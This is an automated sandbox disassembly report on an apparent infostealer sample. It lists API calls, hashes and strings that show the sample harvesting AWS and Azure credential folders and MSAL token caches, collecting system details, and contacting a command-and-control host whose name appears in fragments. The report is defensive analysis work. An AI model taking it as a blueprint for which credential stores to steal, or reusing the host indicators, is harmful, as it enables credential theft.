                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 39ee05ec24a1b7a2e2ef0f0556164a6fe9c2841affaa1a713c40df59af8ac870
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12028171D1512A9BCB20EB21CD46ADDB7B5FF04748F0190E6A54877152CAB87ECA8FC8

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            control_flow_graph 2464 401666-40169e GetTempPathW 2465 4016a4-4016cb wsprintfW 2464->2465 2466 401809-40180b 2464->2466 2467 4016d0-4016f5 CreateFileW 2465->2467 2468 4017fa-401808 call 41d05a 2466->2468 2467->2466 2470 4016fb-40174e GetProcessHeap RtlAllocateHeap _time64 srand rand call 423c60 WriteFile 2467->2470 2470->2466 2474 401754-40175a 2470->2474 2474->2466 2475 401760-40179c call 423c60 CloseHandle CreateFileW 2474->2475 2475->2466 2478 40179e-4017b1 ReadFile 2475->2478 2478->2466 2479 4017b3-4017b9 2478->2479 2479->2466 2480 4017bb-4017f1 call 423c60 GetProcessHeap RtlFreeHeap CloseHandle 2479->2480 2480->2467 2483 4017f7-4017f9 2480->2483 2483->2468
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 00401696
                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 004016BC
                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00401705
                                                                                                                                                                                                                            • _time64.MSVCRT ref: 0040170E
                                                                                                                                                                                                                            • srand.MSVCRT ref: 00401715
                                                                                                                                                                                                                            • rand.MSVCRT ref: 0040171E
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 0040172E
                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00401763
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00401771
                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004017BE
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000), ref: 004017CF
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 004017DB
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                                                                                                                                                                            • String ID: %s%s$delays.tmp
                                                                                                                                                                                                                            • API String ID: 1620473967-1413376734
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 004117E3
                                                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000,0000004C,00413F39,Install Date: ,004368B8,00000000,Windows: ,004368A8,Work Dir: In memory,00436890), ref: 004117F4
                                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411805
                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041181F
                                                                                                                                                                                                                            • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411855
                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004118B0
                                                                                                                                                                                                                              • Part of subcall function 0041172C: __EH_prolog3_catch.LIBCMT ref: 00411733
                                                                                                                                                                                                                              • Part of subcall function 0041172C: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,004118D6,?), ref: 00411756
                                                                                                                                                                                                                              • Part of subcall function 0041172C: SysAllocString.OLEAUT32(?), ref: 00411763
                                                                                                                                                                                                                              • Part of subcall function 0041172C: _wtoi64.MSVCRT ref: 00411796
                                                                                                                                                                                                                              • Part of subcall function 0041172C: SysFreeString.OLEAUT32(?), ref: 004117AF
                                                                                                                                                                                                                              • Part of subcall function 0041172C: SysFreeString.OLEAUT32(00000000), ref: 004117B6
                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 004118DF
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004118EB
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004118F2
                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00411931
                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 0041191E
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                                                            • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                                                                                                                                                            • API String ID: 2280294774-461178377
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00416524
                                                                                                                                                                                                                              • Part of subcall function 00411D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DD2
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416543
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,\.azure\), ref: 00416560
                                                                                                                                                                                                                              • Part of subcall function 00416013: wsprintfA.USER32 ref: 0041605A
                                                                                                                                                                                                                              • Part of subcall function 00416013: FindFirstFileA.KERNEL32(?,?), ref: 00416071
                                                                                                                                                                                                                              • Part of subcall function 00416013: StrCmpCA.SHLWAPI(?,00436ABC), ref: 00416092
                                                                                                                                                                                                                              • Part of subcall function 00416013: StrCmpCA.SHLWAPI(?,00436AC0), ref: 004160AC
                                                                                                                                                                                                                              • Part of subcall function 00416013: wsprintfA.USER32 ref: 004160D3
                                                                                                                                                                                                                              • Part of subcall function 00416013: StrCmpCA.SHLWAPI(?,00436647), ref: 004160E7
                                                                                                                                                                                                                              • Part of subcall function 00416013: wsprintfA.USER32 ref: 00416104
                                                                                                                                                                                                                              • Part of subcall function 00416013: PathMatchSpecA.SHLWAPI(?,?), ref: 00416131
                                                                                                                                                                                                                              • Part of subcall function 00416013: lstrcatA.KERNEL32(?), ref: 00416167
                                                                                                                                                                                                                              • Part of subcall function 00416013: lstrcatA.KERNEL32(?,00436AD8), ref: 00416179
                                                                                                                                                                                                                              • Part of subcall function 00416013: lstrcatA.KERNEL32(?,?), ref: 0041618C
                                                                                                                                                                                                                              • Part of subcall function 00416013: lstrcatA.KERNEL32(?,00436ADC), ref: 0041619E
                                                                                                                                                                                                                              • Part of subcall function 00416013: lstrcatA.KERNEL32(?,?), ref: 004161B2
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00416598
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 004165BA
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,\.aws\), ref: 004165D7
                                                                                                                                                                                                                              • Part of subcall function 00416013: wsprintfA.USER32 ref: 0041611B
                                                                                                                                                                                                                              • Part of subcall function 00416013: CopyFileA.KERNEL32(?,?,00000001), ref: 0041626B
                                                                                                                                                                                                                              • Part of subcall function 00416013: DeleteFileA.KERNEL32(?), ref: 004162DF
                                                                                                                                                                                                                              • Part of subcall function 00416013: FindNextFileA.KERNEL32(?,?), ref: 00416341
                                                                                                                                                                                                                              • Part of subcall function 00416013: FindClose.KERNEL32(?), ref: 00416355
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 0041660C
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0041662E
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 0041664B
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00416680
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                                                                            • API String ID: 780282842-974132213
                                                                                                                                                                                                                            • Opcode ID: 0f8bb1a1cda5efe2ef2a13cb43bc274b5f52338409e8384a10e56f8f3184d20b
                                                                                                                                                                                                                            • Instruction ID: 3cefbc2560fae273e5afeb2847eac18d6cd6927558b4bb74fdd557bb6d377028
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f8bb1a1cda5efe2ef2a13cb43bc274b5f52338409e8384a10e56f8f3184d20b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B441B971D4022D7ADB24EB61EC4BFDD7778AB08304F1444AAB605F70D1DAB8AB848F59
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 00411C1F: GetSystemTime.KERNEL32(?,004366E2,?), ref: 00411C4E
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0040AC5F
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040AD69
                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 0040AD70
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,004373D4,00000000), ref: 0040AE21
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,004373D8), ref: 0040AE49
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 0040AE6D
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,004373DC), ref: 0040AE79
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 0040AE83
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,004373E0), ref: 0040AE8F
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 0040AE99
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,004373E4), ref: 0040AEA5
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 0040AEAF
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,004373E8), ref: 0040AEBB
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 0040AEC5
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,004373EC), ref: 0040AED1
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 0040AEDB
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,004373F0), ref: 0040AEE7
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 0040AEF1
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,004373F4), ref: 0040AEFD
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040AF4F
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040AF6A
                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040AFAD
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1956182324-0
                                                                                                                                                                                                                            • Opcode ID: 1969370fe5d766ed8fae6fec07b2a4e8d94643813e69ebe2ca72e66b7174e537
                                                                                                                                                                                                                            • Instruction ID: a1bbec3347a3a128a7b507e9df3142849c92e8e8a29d79e5ebaa2b33eb0b59c6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1969370fe5d766ed8fae6fec07b2a4e8d94643813e69ebe2ca72e66b7174e537
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68C14E32904209ABDF15FBA1ED4A9DD7B76EF04305F10502AF501B30B2DBB96E859B89
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 00410C28: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C34
                                                                                                                                                                                                                              • Part of subcall function 00410C28: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C3B
                                                                                                                                                                                                                              • Part of subcall function 00410C28: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C4F
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,004185D1), ref: 0041711F
                                                                                                                                                                                                                            • OpenEventA.KERNEL32(001F0003,00000000,?,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041712E
                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,004366D6), ref: 0041764C
                                                                                                                                                                                                                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 0041770D
                                                                                                                                                                                                                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00417726
                                                                                                                                                                                                                              • Part of subcall function 00404B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                                                                                                                                                              • Part of subcall function 00404B2E: StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                                                                                                                                                              • Part of subcall function 00413A02: StrCmpCA.SHLWAPI(?,block,?,?,00417786), ref: 00413A17
                                                                                                                                                                                                                              • Part of subcall function 00413A02: ExitProcess.KERNEL32 ref: 00413A22
                                                                                                                                                                                                                              • Part of subcall function 00405F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                                                                                                                                                              • Part of subcall function 00405F39: StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                                                                                                                                                              • Part of subcall function 004131D8: strtok_s.MSVCRT ref: 004131F7
                                                                                                                                                                                                                              • Part of subcall function 004131D8: strtok_s.MSVCRT ref: 0041327A
                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 00417ADC
                                                                                                                                                                                                                              • Part of subcall function 00405F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                                                                                                                                                              • Part of subcall function 00405F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                                                                                                                                                              • Part of subcall function 00405F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,004185D1), ref: 00417142
                                                                                                                                                                                                                              • Part of subcall function 00412554: __EH_prolog3_catch_GS.LIBCMT ref: 0041255E
                                                                                                                                                                                                                              • Part of subcall function 00412554: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E73,.exe,00436CD4,00436CD0,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC), ref: 0041257D
                                                                                                                                                                                                                              • Part of subcall function 00412554: Process32First.KERNEL32(00000000,00000128), ref: 0041258D
                                                                                                                                                                                                                              • Part of subcall function 00412554: Process32Next.KERNEL32(00000000,00000128), ref: 0041259F
                                                                                                                                                                                                                              • Part of subcall function 00412554: StrCmpCA.SHLWAPI(?), ref: 004125B1
                                                                                                                                                                                                                              • Part of subcall function 00412554: CloseHandle.KERNEL32(00000000), ref: 004125C5
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00418042
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
                                                                                                                                                                                                                            • String ID: .exe$.exe$0b3bd69430b7d827b107ba2ed809207d$_DEBUG.zip$cowod.$hopto$http://$org
                                                                                                                                                                                                                            • API String ID: 305159127-3642742264
                                                                                                                                                                                                                            • Opcode ID: f6d7053e733674245ef1cdd8f6d089b2bf2fa6d3358bc3ba76893411eb2cc9bc
                                                                                                                                                                                                                            • Instruction ID: 8df2a6c4b46c73ca4ddf54cc8c0bb9bb361c8bd8d3ae006cdaff17597551342b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6d7053e733674245ef1cdd8f6d089b2bf2fa6d3358bc3ba76893411eb2cc9bc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F3923E715083459BC620FF25D94268EB7E1FF84708F51482FF58477191DBB8AA8E8B8B
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 0041362A
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,true), ref: 004136EC
                                                                                                                                                                                                                              • Part of subcall function 0041051E: lstrlenA.KERNEL32(?,?,004171B6,004366BE,004366BB,?,?,?,?,004185D1), ref: 00410524
                                                                                                                                                                                                                              • Part of subcall function 0041051E: lstrcpyA.KERNEL32(00000000,00000000,?,004171B6,004366BE,004366BB,?,?,?,?,004185D1), ref: 00410556
                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 004137AE
                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 004137DF
                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 0041381B
                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 00413857
                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 00413893
                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 004138CF
                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 0041390B
                                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 004139CF
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
• Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                                                                                                                                            • String ID: false$true
                                                                                                                                                                                                                            • API String ID: 2116072422-2658103896
                                                                                                                                                                                                                            • Opcode ID: f5d0ab9b180171e2259bdd84d25315b637cbf501645ae5f4d352ab184134a0b5
                                                                                                                                                                                                                            • Instruction ID: 4b9006c81de5cbe442b288e1576c32e24171c8e14767bb27393f0de91e811dc5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5d0ab9b180171e2259bdd84d25315b637cbf501645ae5f4d352ab184134a0b5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8B138B59002189BCF60EF64DC89ADA77B5BF18305F0001EAE549A72A1DB75AFD4CF44
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004012A7
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004012B6
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0043A9EC), ref: 004012D0
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0043A9F0), ref: 004012DE
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0043A9F4), ref: 004012EC
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0043A9F8), ref: 004012FA
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0043A9FC), ref: 00401308
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0043AA00), ref: 00401316
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0043AA04), ref: 00401324
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0043AA08), ref: 00401332
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0043AA0C), ref: 00401340
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0043AA10), ref: 0040134E
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0043AA14), ref: 0040135C
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0043AA18), ref: 0040136A
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0043AA1C), ref: 00401378
                                                                                                                                                                                                                              • Part of subcall function 00410C5A: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C66
                                                                                                                                                                                                                              • Part of subcall function 00410C5A: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C6D
                                                                                                                                                                                                                              • Part of subcall function 00410C5A: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410C81
                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 004013E3
                                                                                                                                                                                                                            Memory Dump Source
• Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcat$HeapProcess_memset$AllocComputerExitName
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1553874529-0
                                                                                                                                                                                                                            • Opcode ID: 927124d3e7746fc297e5f2fe29e5e0df559b15ca6c40b02dbd458cf132794fcb
                                                                                                                                                                                                                            • Instruction ID: 4641dc2a71a7f36ffdc22951e019d2d4c0538419c1ec9b6f3a97985c37de70f2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 927124d3e7746fc297e5f2fe29e5e0df559b15ca6c40b02dbd458cf132794fcb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB4185B2E4422C66DB20DB719C59FDB7BAC9F14710F5005A3A8D8F3181D67C9A88CB98
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670E,00000000,?,?), ref: 00411248
                                                                                                                                                                                                                            • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00411285
                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 004112B2
                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112D1
                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411307
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0041131C
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
